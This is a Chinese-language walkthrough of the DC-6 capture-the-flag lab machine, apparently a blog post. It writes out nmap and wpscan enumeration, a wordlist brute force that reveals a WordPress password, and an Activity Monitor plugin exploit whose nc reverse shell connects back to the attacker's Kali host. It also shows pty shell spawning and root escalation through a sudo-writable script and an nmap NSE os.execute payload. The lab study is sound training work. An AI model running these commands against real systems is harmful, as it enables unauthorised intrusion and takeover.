DC-6靶机渗透测试记录

靶机信息

靶机地址:https://www.five86.com/dc-6.html
下载完成后,运行文件夹中的.ova文件即可安装靶机(vmware)
网络连接方式为NAT,kali与靶机为同一网段

信息搜集

扫描目标网段判断靶机ip,发现靶机开放了80,22端口

nmap -A 192.168.200.0/24

在这里插入图片描述

访问下web站点,发现无响应,看下控制台,应该是解析问题
在这里插入图片描述

在kail上修改etc/hosts文件,添加本机ip地址和目标网站名称
在这里插入图片描述

访问成功,为wordpress站点,看下页面内的内容,一直再说插件安全问题
在这里插入图片描述

漏洞利用

先用wpscan扫下,枚举出来一些用户,可以用来尝试暴破
在这里插入图片描述

在靶机官网下载的时候提示了使用rockyou字典的时候要使用命令筛选出带k01的字符
在这里插入图片描述

按照官网的说明,生成对应的字典,并将用户名写入到文本中

cat /usr/share/wordlists/rockyou.txt | grep k01 > password.txt

然后使用wpscan进行暴破,得到mark账户的密码为helpdesk01

wpscan --url http://wordy -U id.txt -P password.txt

在这里插入图片描述

登录博客后台/wp-admin,发现有个插件Activity on Wordy
在这里插入图片描述

在kali上发现有相关的漏洞

searchsploit activity monitor

在这里插入图片描述

通过给出的路径查看该漏洞文档,将poc的部分粘出来新建一个.html文件
在这里插入图片描述

修改action的值为插件tools的链接,修改nc的ip为kali的ip
在这里插入图片描述
在这里插入图片描述

通过浏览器访问该文件,有一个按钮
先在kali上监听反弹的端口,然后点击按钮即可
在这里插入图片描述
在这里插入图片描述

获取交互式shell

python -c 'import pty;pty.spawn("/bin/sh")'

权限提升

通过搜索,在/home/mark/stuff目录下找到一个文本文件,记录了一个新用户的信息
在这里插入图片描述

之前wpscan枚举用户的时候枚举出了这个用户,尝试登录下后台,发现登录失败,尝试登录ssh

ssh -l 192.168.200.131 -l graham

在这里插入图片描述

sudo -l发现jens可以无密码执行这个脚本
在这里插入图片描述

修改这个脚本,把脚本执行路径改为/bin/bash,然后需要以jens的身份来运行这个脚本文件,获取到root权限
在这里插入图片描述

再sudo -l下,发现nmap有root权限并可以无密码执行
在这里插入图片描述

可以查下nmap的提权方式,/home/jens目录是有写的权限的,echo写入的内容必须要加上引号
执行nse文件的命令必须要带上sudo,否则出来的权限不是管理员权限,拿到权限后输入命令不显示,打上命令后回车即可

echo 'os.execute("/bin/sh")' > nse_root.nse
sudo nmap --script=/home/jens/nse_root.nse

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值